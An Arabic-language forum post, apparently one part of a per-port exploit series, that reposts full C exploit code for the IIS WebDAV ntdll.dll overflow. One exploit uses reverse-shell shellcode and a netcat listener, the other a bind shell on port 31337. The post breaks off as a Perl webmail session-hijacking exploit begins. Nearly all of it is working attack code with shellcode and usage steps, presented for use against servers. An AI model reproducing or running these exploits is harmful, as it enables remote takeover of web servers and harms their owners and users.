اخلاقي تاج راسي
09-02-2013, 11:24 AM
بسم الله الرحمن الرحيم
السلام عليكم و رحمة الله و بركاته
إن شاء الله تكونو في افضل حال
مثل ما قلت لكم لدينا 114 بورت و لكل بورت ثغراتها
طرحنا ثمانيه بورتات 21 و 22 و 23 و 25 و 42 و 53 و 69 و 70
و الان سنطرح بورت 80 و 81 وبكذا كملنا 10 بورتات وبقي لدينا 104
الخير كثير:wink:
بقول بسم الله الرحمن الرحيم
نبداء بـ بورت 80
80 MS Windows WebDAV (ntdll.dll) Remote Exploit
/************************************************** *****************/
/* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */
/* --------------------------------------------------------------- */
/* this is the exploit for ntdll.dll through WebDAV. */
/* run a netcat ex: nc -L -vv -p 666 */
/* wb server.com your_ip 666 0 */
/* the shellcode is a reverse remote shell */
/* you need to pad a bit.. the best way I think is launching */
/* the exploit with pad = 0 and after that, the server will be */
/* down for a couple of seconds, now retry with pad at 1 */
/* and so on..pad 2.. pad 3.. if you haven't the shell after */
/* something like pad at 10 I think you better to restart from */
/* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */
/* on all the others servers it was at 2,3,4, etc..sometimes */
/* you can have the force with you, and get the shell in 1 try */
/* sometimes you need to pad more than 10 times ;) */
/* the shellcode was coded by myself, it is SEH + ScanMem to */
/* find the famous offsets (GetProcAddress).. */
/* */
/************************************************** *****************/
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#pragma comment (lib,"ws2_32")
char shellc0de[] =
"\x55\x8b\xec\x33\xc9\x53\x56\x57\x8d\x7d\xa2\xb1\x 25\xb8\xcc\xcc"
"\xcc\xcc\xf3\xab\xeb\x09\xeb\x0c\x58\x5b\x59\x5a\x 5c\x5d\xc3\xe8"
"\xf2\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\x b5\x01\x80\x33"
"\x95\x43\xe2\xfa\x66\x83\xeb\x67\xfc\x8b\xcb\x8b\x f3\x66\x83\xc6"
"\x46\xad\x56\x40\x74\x16\x55\xe8\x13\x00\x00\x00\x 8b\x64\x24\x08"
"\x64\x8f\x05\x00\x00\x00\x00\x58\x5d\x5e\xeb\xe5\x 58\xeb\xb9\x64"
"\xff\x35\x00\x00\x00\x00\x64\x89\x25\x00\x00\x00\x 00\x48\x66\x81"
"\x38\x4d\x5a\x75\xdb\x64\x8f\x05\x00\x00\x00\x00\x 5d\x5e\x8b\xe8"
"\x03\x40\x3c\x8b\x78\x78\x03\xfd\x8b\x77\x20\x03\x f5\x33\xd2\x8b"
"\x06\x03\xc5\x81\x38\x47\x65\x74\x50\x75\x25\x81\x 78\x04\x72\x6f"
"\x63\x41\x75\x1c\x81\x78\x08\x64\x64\x72\x65\x75\x 13\x8b\x47\x24"
"\x03\xc5\x0f\xb7\x1c\x50\x8b\x47\x1c\x03\xc5\x8b\x 1c\x98\x03\xdd"
"\x83\xc6\x04\x42\x3b\x57\x18\x75\xc6\x8b\xf1\x56\x 55\xff\xd3\x83"
"\xc6\x0f\x89\x44\x24\x20\x56\x55\xff\xd3\x8b\xec\x 81\xec\x94\x00"
"\x00\x00\x83\xc6\x0d\x56\xff\xd0\x89\x85\x7c\xff\x ff\xff\x89\x9d"
"\x78\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x33\x c9\x51\x51\x51"
"\x51\x41\x51\x41\x51\xff\xd0\x89\x85\x94\x00\x00\x 00\x8b\x85\x7c"
"\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x83\xc6\x 08\x6a\x10\x56"
"\x8b\x8d\x94\x00\x00\x00\x51\xff\xd0\x33\xdb\xc7\x 45\x8c\x44\x00"
"\x00\x00\x89\x5d\x90\x89\x5d\x94\x89\x5d\x98\x89\x 5d\x9c\x89\x5d"
"\xa0\x89\x5d\xa4\x89\x5d\xa8\xc7\x45\xb8\x01\x01\x 00\x00\x89\x5d"
"\xbc\x89\x5d\xc0\x8b\x9d\x94\x00\x00\x00\x89\x5d\x c4\x89\x5d\xc8"
"\x89\x5d\xcc\x8d\x45\xd0\x50\x8d\x4d\x8c\x51\x6a\x 00\x6a\x00\x6a"
"\x00\x6a\x01\x6a\x00\x6a\x00\x83\xc6\x09\x56\x6a\x 00\x8b\x45\x20"
"\xff\xd0"
"CreateProcessA\x00LoadLibraryA\x00ws2_32.dll\x00WS ASocketA\x00"
"connect\x00\x02\x00\x02\x9A\xC0\xA8\x01\x01\x00"
"cmd" // don't change anything..
"\x00\x00\xe7\x77" // offsets of kernel32.dll for some win ver..
"\x00\x00\xe8\x77"
"\x00\x00\xf0\x77"
"\x00\x00\xe4\x77"
"\x00\x88\x3e\x04" // win2k3
"\x00\x00\xf7\xbf" // win9x =P
"\xff\xff\xff\xff";
int test_host(char *host)
{
char search[100]="";
int sock;
struct hostent *heh;
struct sockaddr_in hmm;
char buf[100] ="";
if(strlen(host)>60) {
printf("error: victim host too long.\r\n");
return 1;
}
if ((heh = gethostbyname(host))==0){
printf("error: can't resolve '%s'",host);
return 1;
}
sprintf(search,"SEARCH / HTTP/1.1\r\nHost: %s\r\n\r\n",host);
hmm.sin_port = htons(80);
hmm.sin_family = AF_INET;
hmm.sin_addr = *((struct in_addr *)heh->h_addr);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("error: can't create socket");
return 1;
}
printf("Checking WebDav on '%s' ... ",host);
if ((connect(sock, (struct sockaddr *) &hmm, sizeof(hmm))) == -1){
printf("CONNECTING_ERROR\r\n");
return 1;
}
send(sock,search,strlen(search),0);
recv(sock,buf,sizeof(buf),0);
if(buf[9]=='4'&&buf[10]=='1'&&buf[11]=='1')
return 0;
printf("NOT FOUND\r\n");
return 1;
}
void help(char *program)
{
printf("syntax: %s <victim_host> <your_host> <your_port> [padding]\r\n",program);
return;
}
void banner(void)
{
printf("\r\n\t [Crpt] ntdll.dll exploit trough WebDAV by kralor
[Crpt]\r\n");
printf("\t\twww.coromputer.net && undernet #coromputer\r\n\r\n");
return;
}
void main(int argc, char *argv[])
{
WSADATA wsaData;
unsigned short port=0;
char *port_to_shell="", *ip1="", data[50]="";
unsigned int i,j;
unsigned int ip = 0 ;
int s, PAD=0x10;
struct hostent *he;
struct sockaddr_in crpt;
char buffer[65536] ="";
char request[80000]; // huuuh, what a mess! :)
char content[] =
"<?xml version=\"1.0\"?>\r\n"
"<g:searchrequest xmlns:g=\"DAV:\">\r\n"
"<g:sql>\r\n"
"Select \"DAV:displayname\" from scope()\r\n"
"</g:sql>\r\n"
"</g:searchrequest>\r\n";
banner();
if((argc<4)||(argc>5)) {
help(argv[0]);
return;
}
if(WSAStartup(0x0101,&wsaData)!=0) {
printf("error starting winsock..");
return;
}
if(test_host(argv[1]))
return;
if(argc==5)
PAD+=atoi(argv[4]);
printf("FOUND\r\nexploiting ntdll.dll through WebDav [ret: 0x00%02x00%02x]\r\n",PAD,PAD);
ip = inet_addr(argv[2]); ip1 = (char*)&ip;
shellc0de[448]=ip1[0]; shellc0de[449]=ip1[1]; shellc0de[450]=ip1[2];
shellc0de[451]=ip1[3];
port = htons(atoi(argv[3]));
port_to_shell = (char *) &port;
shellc0de[446]=port_to_shell[0];
shellc0de[447]=port_to_shell[1];
// we xor the shellcode [xored by 0x95 to avoid bad chars]
__asm {
lea eax, shellc0de
add eax, 0x34
xor ecx, ecx
mov cx, 0x1b0
wah:
xor byte ptr[eax], 0x95
inc eax
loop wah
}
if ((he = gethostbyname(argv[1]))==0){
printf("error: can't resolve '%s'",argv[1]);
return;
}
crpt.sin_port = htons(80);
crpt.sin_family = AF_INET;
crpt.sin_addr = *((struct in_addr *)he->h_addr);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("error: can't create socket");
return;
}
printf("Connecting... ");
if ((connect(s, (struct sockaddr *) &crpt, sizeof(crpt))) == -1){
printf("ERROR\r\n");
return;
}
// No Operation.
for(i=0;i<sizeof(buffer);buffer[i]=(char)0x90,i++);
// fill the buffer with the shellcode
for(i=64000,j=0;i<sizeof(buffer)&&j<sizeof(shellc0de)-1;buffer[i]=shellc0de[j],i++,j++);
// well..it is not necessary..
for(i=0;i<2500;buffer[i]=PAD,i++);
/* we can simply put our ret in this 2 offsets.. */
//buffer[2086]=PAD;
//buffer[2085]=PAD;
buffer[sizeof(buffer)]=0x00;
memset(request,0,sizeof(request));
memset(data,0,sizeof(data));
sprintf(request,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nContent-Length: ",buffer,argv[1]);
sprintf(request,"%s%d\r\n\r\n",request,strlen(content));
printf("CONNECTED\r\nSending evil request... ");
send(s,request,strlen(request),0);
send(s,content,strlen(content),0);
printf("SENT\r\n");
recv(s,data,sizeof(data),0);
if(data[0]!=0x00) {
printf("Server seems to be patched.\r\n");
printf("data: %s\r\n",data);
} else
printf("Now if you are lucky you will get a shell.\r\n");
closesocket(s);
return;
}
// [2003-03-23]
80 MS Windows WebDAV Remote PoC Exploit
/*************************************/
/* IIS 5.0 WebDAV -Proof of concept- */
/* [ Bug: CAN-2003-0109 ] */
/* By Roman Medina-Heigl Hernandez */
/* aka RoMaNSoFt <[email protected]> */
/* Madrid, 23.Mar.2003 */
/* ================================= */
/* Public release. Version 1. */
/* --------------------------------- */
/*************************************/
/* ================================================== ==================
* --[ READ ME ]
*
* This exploit is mainly a proof of concept of the recently discovered ntdll.dll bug (which may be
* exploited in many other programs, not necessarily IIS). Practical exploitation is not as easy as
* expected due to difficult RET guessing mixed with possible IIS crashes (which makes RET brute
* forcing a tedious work). The shellcode included here will bind a cmd.exe shell to a given port
* at the victim machine so it could be problematic if that machine is protected behind a firewall.
* For all these reasons, the scope of this code is limited and mainly intended for educational
* purposes. I am not responsible of possible damages created by the use of this exploit code.
*
* The program sends a HTTP request like this:
*
* SEARCH /[nop] [ret][ret][ret] ... [ret] [nop][nop][nop][nop][nop] ... [nop] [jmpcode] HTTP/1.1
* {HTTP headers here}
* {HTTP body with webDAV content}
* 0x01 [shellcode]
*
* IIS converts the first ascii string ([nop]...[jmpcode]) to Unicode using UTF-16 encoding (for
* instance, 0x41 becomes 0x41 0x00, i.e. an extra 0x00 byte is added) and it is the resultant
* Unicode string the one producing the overflow. So at first glance, we cannot include code here
* (more on this later) because it would get corrupted by 0x00 (and other) inserted bytes. Not at
* least using the common method. Another problem that we will have to live with is our RET value
* being padded with null bytes, so if we use 0xabcd in our string, the real RET value (i.e. the
* one EIP will be overwritten with) would be 0x00ab00cd. This is an important restriction.
*
* We have two alternatives:
*
* 1) The easy one: find any occurrences of our ascii string (i.e. before it gets converted to
* the Unicode form) in process memory. Problem: normally we should find it by debugging the
* vulnerable application and then hardcode the found address (which will be the RET address)
* in our exploit code. This RET address is variable, even for the same version of OS and app
* (I mean, different instances of the same application in the same machine could make the
* guessed RET address invalid at different moments). Now add the restriction of RET value
* padded with null-bytes. Anyway, the main advantage of this method is that we will not have
* to deal with 0x00-padded shellcode.
*
* 2) The not so-easy one: you could insert an encoded shellcode in such a way that when the app
* expands the ascii string (with the encoded shellcode) to Unicode, a valid shellcode is
* automagically placed into memory. Please, refer to Chris Anley's "venetian exploit" paper
* to read more about this. Dave Aitel also has a good paper about this technique and indeed
* he released code written in Python to encode shellcode (I'm wondering if he will release a
* working tool for that purpose, since the actual code was released as part of a commercial
* product, so it cannot be run without buying the whole product, despite the module itself
* being free!). Problem: it is not so easy as the first method ;-) Advantage: when the over-
* flow happens, some registers may point to our Unicoded string (where our Unicoded-shellcode
* lives in), so we don't need to guess the address where shellcode will be placed and the
* chance of a successful exploitation is greatly improved. For instance, in this case, when
* IIS is overflowed, ECX register points to the Unicode string. The idea is then fill in
* RET value with the fixed address of code like "call %ecx". This code may be contained in
* any previosly-loaded library, for example).
*
* Well, guess it... yes... I chose the easy method :-) Perhaps I will rewrite the exploit
* using method 2, but I cannot promise that.
*
* Let's see another problem of the method 1 (which I have used). Not all Unicode conversions
* result in a 0x00 byte being added. This is true for ascii characters lower or equal to 0x7f
* (except for some few special characters, I'm not sure). But our shellcode will have bytes
* greater than 0x7f value. So we don't know the exact length of the Unicoded-string containing
* our shellcode (some ascii chars will expand to more than 2 bytes, I think). As a result,
* sometimes the exploit may not work, because no exact length is matched. For instance, if you
* carry out experiments on this issue, you could see that IIS crashes (overflow occurs) when
* entering a query like SEARCH /AAAA...AAA HTTP/1.1, with 65535 A's. Same happens with 65536.
* But with different values seems NOT to work. So matching the exact length is important here!
*
* What I have done, it is to include a little "jumpcode" instead of the shellcode itself. The
* jumpcode is placed into the "critical" place and has a fixed length, so our string has always
* a fixed length, too. The "variable" part (the shellcode) is placed at the end of the HTTP
* request (so you can insert your own shellcode and remove the one I'm using here, with no apparent
* problem). To be precise, the end of the request will be: 0x01 [shellcode]. The 0x01 byte marks
* the beginning of the shellcode and it is used by the jumpcode to find the address where shell-
* code begins and jump into it. It is not possible to hardcode a relative jump, because HTTP
* headers have a variable length (think about the "Host:" header and you will understand what
* I'm saying). Well, really, the exploit could have calculated the relative jump itself (other
* problems arise like null-bytes possibly contained in the offset field) but I have prefered to
* use the 0x01 trick. It's my exploit, it's my choice :-)
*
* After launching the exploit, several things may happen:
* - the exploit is successful. You can connect to the bound port of victim machine and get a
* shell. Great. Remember that when you issue an "exit" command in the shell prompt, the pro-
* cess will be terminated. This implies that IIS could die.
* - exploit returns a "server not vulnerable" response. Really, the server may not be vulnerable
* or perhaps the SEARCH method used by the exploit is not permitted (the bug can still be
* exploited via GET, probably) or webDAV is disabled at all.
* - exploit did not get success (which is not strange, since it is not easy to guess RET value)
* but the server is vulnerable. IIS will probably not survive: a "net start w3svc" could be
* needed in the victim machine, in order to restart the WWW service.
*
* The following log shows a correct exploitation:
*
* roman@goliat:~/iis5webdav> gcc -o rs_iis rs_iis.c
* roman@goliat:~/iis5webdav> ./rs_iis roman
* Resolving hostname ...
* Attacking port 80 at roman (EIP = 0x00480004)...
* Now open another console/shell and try to connect (telnet) to victim port 31337...
*
* roman@goliat:~/iis5webdav> telnet roman 31337
* Trying 192.168.0.247...
* Connected to roman.
* Escape character is '^]'.
* Microsoft Windows 2000 [VersiA¢n 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
*
* C:\WINNT\system32>
*
*
* I am not going to show logs for the faulty cases. I'm pretty sure you will see them very
* soon :-) But yes, the exploit works, perhaps a little fine-tunning may be required, though.
* So please, do NOT contact me telling that the exploit doesn't work or things like that. It
* worked for me and it will work for you, if you're not a script-kiddie. Try to attach to the
* IIS process (inetinfo.exe) with the help of a debugger (OllyDbg is my favourite) on the
* victim machine and then launch the exploit against it. Debugger will break when the first
* exception is produced. Now place a breakpoint in 0x00ab00cd (being 0xabcd the not-unicoded
* RET value) and resume execution until you reach that point. Finally, it's time to search
* the memory looking for our shellcode. It is nearly impossible (very low chance) that our
* shellcode is found at any 0x00**00**-form address (needed to bypass the RET restriction
* imposed by Unicode conversion) but no problem: you have a lot of NOPs before the shellcode
* where you could point to. If EIP is overwritten with the address of such a NOP, program flow
* will finish reaching our shellcode. Note also that among the two bytes of RET that we have some
* kind of control, the more important is the first one, i.e. the more significant. In other
* words, interesting RET values to try are: 0x0104, 0x0204, 0x0304, 0x0404, 0x0504, ...,
* and so on, till 0xff04. As you may have noticed, the last byte (0x04) is never changed because
* its weight is minimal (256 between aprox. 65000 NOP's is not appreciable).
*
*
* My best wishes,
* --Roman
*
* ===================================== --[ EOT ]-- ====================
*/
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
// Change to fit your need
#define RET 0x4804 // EIP = 0x00480004
#define LOADLIBRARYA 0x0100107c
#define GETPROCADDRESS 0x01001034
// Don't change this
#define PORT_OFFSET 1052
#define LOADL_OFFSET 798
#define GETPROC_OFFSET 815
#define NOP 0x90
#define MAXBUF 100000
/*
* LoadLibraryA IT Address := 0100107C
* GetProcAddress IT Address := 01001034
*/
unsigned char shellcode[] = // Deepzone shellcode
"\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\x b1\x1c"
"\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x 95\x04"
"\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x 99\x99"
"\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x 99\x14"
"\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x 71\x4b"
"\x9b\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14\x24\xaa\x bc\xd9"
"\x99\xf3\x93\x09\x09\x09\x09\xc0\x71\x23\x9b\x99\x 99\xf3"
"\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\x d9\x99"
"\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\x d9\x99"
"\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\x bc\xd9"
"\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\x bc\xd9"
"\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x 2c\x6c"
"\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\x b4\xbf"
"\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x a8\xbf"
"\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x 68\xbc"
"\xd9\x99\x14\x24\xb4\xbf\xd9\x99\x3c\x14\x2c\x7c\x bc\xd9"
"\x99\x34\x14\x24\xa8\xbf\xd9\x99\x32\x14\x24\xac\x bf\xd9"
"\x99\x32\x5e\x1c\xbc\xbf\xd9\x99\x99\x99\x99\x99\x 5e\x1c"
"\xb8\xbf\xd9\x99\x98\x98\x99\x99\x14\x2c\xa0\xbf\x d9\x99"
"\xcf\x14\x2c\x6c\xbc\xd9\x99\xcf\xf3\x99\xf3\x99\x f3\x89"
"\xf3\x98\xf3\x99\xf3\x99\x14\x2c\xd0\xbf\xd9\x99\x cf\xf3"
"\x99\x66\x0c\xa2\xbc\xd9\x99\xf1\x99\xb9\x99\x99\x 09\xf1"
"\x99\x9b\x99\x99\x66\x0c\xda\xbc\xd9\x99\x10\x1c\x c8\xbf"
"\xd9\x99\xaa\x59\xc9\xd9\xc9\xd9\xc9\x66\x0c\x63\x bd\xd9"
"\x99\xc9\xc2\xf3\x89\x14\x2c\x50\xbc\xd9\x99\xcf\x ca\x66"
"\x0c\x67\xbd\xd9\x99\xf3\x9a\xca\x66\x0c\x9b\xbc\x d9\x99"
"\x14\x2c\xcc\xbf\xd9\x99\xcf\x14\x2c\x50\xbc\xd9\x 99\xcf"
"\xca\x66\x0c\x9f\xbc\xd9\x99\x14\x24\xc0\xbf\xd9\x 99\x32"
"\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\x c9\x14"
"\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x 99\xf3"
"\xa9\x66\x0c\xd6\xbc\xd9\x99\x72\xd4\x09\x09\x09\x aa\x59"
"\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x 2c\x70"
"\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\x c9\x66"
"\x0c\xd6\xbc\xd9\x99\x1a\x24\xfc\xbf\xd9\x99\x9b\x 96\x1b"
"\x8e\x98\x99\x99\x18\x24\xfc\xbf\xd9\x99\x98\xb9\x 99\x99"
"\xeb\x97\x09\x09\x09\x09\x5e\x1c\xfc\xbf\xd9\x99\x 99\xb9"
"\x99\x99\xf3\x99\x12\x1c\xfc\xbf\xd9\x99\x14\x24\x fc\xbf"
"\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x 2c\x70"
"\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\x c9\x66"
"\x0c\xd6\xbc\xd9\x99\x12\x1c\xfc\xbf\xd9\x99\xf3\x 99\xc9"
"\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\x d9\x99"
"\x34\xc9\x66\x0c\x93\xbc\xd9\x99\xf3\x99\x14\x24\x fc\xbf"
"\xd9\x99\xce\xf3\x99\xf3\x99\xf3\x99\x14\x2c\x70\x bc\xd9"
"\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66\x 0c\xd6"
"\xbc\xd9\x99\xaa\x50\xa0\x14\xfc\xbf\xd9\x99\x96\x 1e\xfe"
"\x66\x66\x66\xf3\x99\xf1\x99\xb9\x99\x99\x09\x14\x 2c\xc8"
"\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\x c9\x66"
"\x0c\x97\xbc\xd9\x99\x10\x1c\xf8\xbf\xd9\x99\xf3\x 99\x14"
"\x24\xfc\xbf\xd9\x99\xce\xc9\x14\x2c\xc8\xbf\xd9\x 99\x34"
"\xc9\x14\x2c\x74\xbc\xd9\x99\x34\xc9\x66\x0c\xd2\x bc\xd9"
"\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\xf3\x99\x12\x 1c\xf8"
"\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x 1c\xc8"
"\xbf\xd9\x99\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x 66\x0c"
"\xde\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\x 70\x20"
"\x67\x66\x66\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x 0c\x8b"
"\xbc\xd9\x99\x14\x2c\xc4\xbf\xd9\x99\x34\xc9\x66\x 0c\x8b"
"\xbc\xd9\x99\xf3\x99\x66\x0c\xce\xbc\xd9\x99\xc8\x cf\xf1"
"\xe5\x89\x99\x98\x09\xc3\x66\x8b\xc9\xc2\xc0\xce\x c7\xc8"
"\xcf\xca\xf1\xad\x89\x99\x98\x09\xc3\x66\x8b\xc9\x 35\x1d"
"\x59\xec\x62\xc1\x32\xc0\x7b\x70\x5a\xce\xca\xd6\x da\xd2"
"\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0\x f7\xfd"
"\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\x e9\xed"
"\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\x f5\xf6"
"\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99\xd2\xdc\xcb\x d7\xdc"
"\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\x e9\xfc"
"\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\x f7\xff"
"\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\x fa\xfc"
"\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\x fd\xc9"
"\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\x f5\xf6"
"\xfa\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xce\x eb\xf0"
"\xed\xfc\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x 99\xda"
"\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xdc\x e1\xf0"
"\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xda\xf6\xfd\x fc\xfd"
"\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xa5\xf0\xe3\x f8\xf7"
"\xd9\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\x fe\xa7"
"\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x 99\x99"
"\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x 90\x90";
unsigned char jumpcode[] = "\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7";
/* mov edi, ecx
* xor al, al
* inc al
* repnz scasb
* jmp edi
*/
char body[] = "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" \
"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n";
/* Our code starts here */
int main (int argc, char **argv)
{
unsigned long ret;
unsigned short port;
int tport, bport, s, i, j, r, rt=0;
struct hostent *h;
struct sockaddr_in dst;
char buffer[MAXBUF];
if (argc < 2 || argc > 5)
{
printf("IIS 5.0 WebDAV Exploit by RoMaNSoFt <[email protected]>. 23/03/2003\nUsage: %s <target host> [target port] [bind port] [ret]\nE.g 1: %s victim.com\nE.g 2: %s victim.com 80 31337 %#.4x\n", argv[0], argv[0], argv[0], RET);
exit(-1);
}
// Default target port = 80
if (argc > 2)
tport = atoi(argv[2]);
else
tport = 80;
// Default bind port = 31337
if (argc > 3)
bport = atoi(argv[3]);
else
bport = 31337;
// Default ret value = RET
if (argc > 4)
ret = strtoul(argv[4], NULL, 16);
else
ret = RET;
if ( ret > 0xffff || (ret & 0xff) == 0 || (ret & 0xff00) == 0 )
{
fprintf(stderr, "RET value must be in 0x0000-0xffff range and it may not contain null-bytes\nAborted!\n");
exit(-2);
}
// Shellcode patching
port = htons(bport);
port ^= 0x9999;
if ( ((port & 0xff) == 0) || ((port & 0xff00) == 0) )
{
fprintf(stderr, "Binding-port contains null-byte. Use another port.\nAborted!\n");
exit(-3);
}
*(unsigned short *)&shellcode[PORT_OFFSET] = port;
*(unsigned long *)&shellcode[LOADL_OFFSET] = LOADLIBRARYA ^ 0x99999999;
*(unsigned long *)&shellcode[GETPROC_OFFSET] = GETPROCADDRESS ^ 0x99999999;
// If the last two items contain any null-bytes, exploit will fail.
// WARNING: this check is not performed here. Be careful and check it for yourself!
// Resolve hostname
printf(" Resolving hostname ...\n");
if ((h = gethostbyname(argv[1])) == NULL)
{
fprintf(stderr, "%s: unknown hostname\n", argv[1]);
exit(-4);
}
bcopy(h->h_addr, &dst.sin_addr, h->h_length);
dst.sin_family = AF_INET;
dst.sin_port = htons(tport);
// Socket creation
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("Failed to create socket");
exit(-5);
}
// Connection
if (connect(s, (struct sockaddr *)&dst, sizeof(dst)) == -1)
{
perror("Failed to connect");
exit(-6);
}
// Build malicious string...
printf(" Attacking port %i at %s (EIP = %#.4x%.4x)...\n", tport, argv[1], ((ret >> 8) & 0xff), ret & 0xff);
bzero(buffer, MAXBUF);
strcpy(buffer, "SEARCH /");
i = strlen(buffer);
buffer[i] = NOP; // Align for RET overwrite
// Normally, EIP will be overwritten with buffer[8+2087] but I prefer to fill some more bytes ;-)
for (j=i+1; j < i+2150; j+=2)
*(unsigned short *)&buffer[j] = (unsigned short)ret;
// The rest is padded with NOP's. RET address should point to this zone!
for (; j < i+65535-strlen(jumpcode); j++)
buffer[j] = NOP;
// Then we skip the body of the HTTP request
memcpy(&buffer[j], jumpcode, strlen(jumpcode));
strcpy(buffer+strlen(buffer), " HTTP/1.1\r\n");
sprintf(buffer+strlen(buffer), "Host: %s\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n", argv[1], strlen(body) + strlen(shellcode));
strcpy(buffer+strlen(buffer), body);
// This byte is used to mark the beginning of the shellcode
memset(buffer+strlen(buffer), 0x01, 1);
// And finally, we land into our shellcode
memset(buffer+strlen(buffer), NOP, 3);
strcpy(buffer+strlen(buffer), shellcode);
// Send request
if (send(s, buffer, strlen(buffer), 0) != strlen(buffer))
{
perror("Failed to send");
exit(-7);
}
printf(" Now open another console/shell and try to connect (telnet) to victim port %i...\n", bport);
// Receive response
while ( (r=recv(s, &buffer[rt], MAXBUF-1, 0)) > 0)
rt += r;
// This code is not bullet-proof. An evil WWW server could return a response bigger than MAXBUF
// and an overflow would occur here. Yes, I'm lazy... :-)
buffer[rt] = '\0';
if (rt > 0)
printf(" Victim server issued the following %d bytes of response:\n--\n%s\n--\n Server NOT vulnerable!\n", rt, buffer);
else
printf(" Server is vulnerable but the exploit failed! Change RET value (e.g. 0xce04) and try again (when IIS is up again) :-/\n", bport);
close(s);
}
// [2003-03-24]
80 CommuniGate Pro Webmail 4.0.6 Session Hijacking Exploit
#!/usr/bin/perl
# Below is exploit code. Place it into cgi-bin, then
# (recommended) make symlink from
# DocumentRoot/AnyImage.gif to shj.pl, configure
# at least $url variable, and possible other vars and
